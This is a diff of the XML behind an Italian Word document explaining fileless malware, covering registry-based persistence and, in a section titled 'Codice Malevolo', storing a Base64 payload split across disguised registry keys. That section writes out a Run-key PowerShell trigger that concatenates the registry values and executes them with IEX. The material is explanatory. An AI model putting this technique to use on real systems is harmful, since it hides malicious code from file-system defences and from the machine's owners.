+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="24"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Exploit Kit e Vulnerabilità Browser: Navigando su un sito compromesso, una vulnerabilità del browser può permettere l'esecuzione di codice JavaScript che interagisce con il sistema, inserendo il payload direttamente nel registro.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Una volta che queste istruzioni sono state scritte nel Registro, il malware ha completato la fase di installazione fileless: da quel momento in poi, il "corpo" del virus risiederà solo nel database del Registro e la sua attività sarà visibile solo in memoria RAM.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>I fileless malware e i registri di sistema</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>, meccanismi di persistenza</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>È bene chiarire a grandi linee cosa è il</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Registro di Sistema di Windows</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>: U</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>n database gerarchico che memorizza le impostazioni di configurazione</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> del sistema operativo e dei programmi installati</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Nell fattispecie, u</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>fileless m</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>lware</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>p</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>uò</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sfruttare </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">opportunamente una o più </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>chiavi d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">el registro </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">per </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>garantire la sua persistenza</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> o la memorizzazione di codice</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Le HKEY</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (Handle to a Key)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> non hanno tutte lo stesso scopo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>ad</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> esempio</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -180,8 +739,8 @@
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="7029"/>
-        <w:gridCol w:w="2599"/>
+        <w:gridCol w:w="6992"/>
+        <w:gridCol w:w="2636"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
@@ -352,6 +911,13 @@
               </w:rPr>
               <w:t>Persistenza globale per tutti gli utenti</w:t>
             </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> al logon</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -436,6 +1002,13 @@
                 <w:szCs w:val="26"/>
               </w:rPr>
               <w:t>Esecuzione di codice durante la fase iniziale del logon</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> per tutti gli utenti</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -691,62 +1264,29 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">I malware fileless, sfruttando opportunamente le chiavi di registro di </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">sistema </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> scrivendo all’interno comandi “</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>legittmi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">”, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>possono creare danni al computer infetto.</w:t>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1 - </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Comandi</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -754,7 +1294,6 @@
         <w:rPr>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
-          <w:u w:val="single"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -1329,7 +1868,7 @@
         </w:rPr>
         <w:t xml:space="preserve">mshta.exe   </w:t>
       </w:r>
-      <w:hyperlink r:id="rId6" w:history="1">
+      <w:hyperlink r:id="rId8" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Collegamentoipertestuale"/>
@@ -1495,24 +2034,550 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">2 - </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Codice Malevolo</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Questa tecnica di "Payload </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Storing</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>" si articola solitamente in due fasi:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Frammentazione e Offuscamento: Il codice malevolo (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">script </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Powershell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ad esempio</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) viene codificato in formato </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Base64</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> e spesso frammentato in più valori di registro per eludere i limiti di dimensione delle singole chiavi.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Mimetismo nei Dati: Il payload viene salvato all'interno di chiavi dai nomi apparentemente legittimi o in aree del registro poco monitorate (ad esempio sotto HKCU\Software\Classes\ o in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>sottochiavi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> di telemetria).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Il registro agisce quindi come una memoria statica e persistente dove il virus risiede in forma di stringa testuale. Al momento dell'esecuzione, un comando minimo (il </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>trigger</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>) preleva questa stringa, la ricompone e la inietta direttamente nella memoria RAM del sistema. Questo approccio rende il malware invisibile a una tradizionale analisi del file system, poiché l'intera logica dell'attacco esiste solo all'interno del database del registro</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> di sistema.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Esempio di esecuzione tramite frammentazione:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>In</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>HKCU\Software\Microsoft\Windows\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>CurrentVersion</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Telemetry</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> viene salvato il valore ID contenente la prima metà del payload in Base64</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>In HKCU\Software\Classes\Local\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>AppData</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> viene salvata la seconda metà</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Nella chiave Run</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> di un software X</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> viene inserito il comando: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t>powershell.exe -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t>Command</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> "IEX (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t>gp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 'HKCU:\...\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t>Telemetry</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t>').ID + (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t>gp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 'HKCU:\...\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t>AppData</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t>).Value</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
@@ -1666,6 +2731,7 @@
                 <w:rPr>
                   <w:sz w:val="26"/>
                   <w:szCs w:val="26"/>
+                  <w:u w:val="single"/>
                 </w:rPr>
               </w:pPr>
               <w:r>
@@ -1692,6 +2758,56 @@
 </w:document>
 </file>
 
+<file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
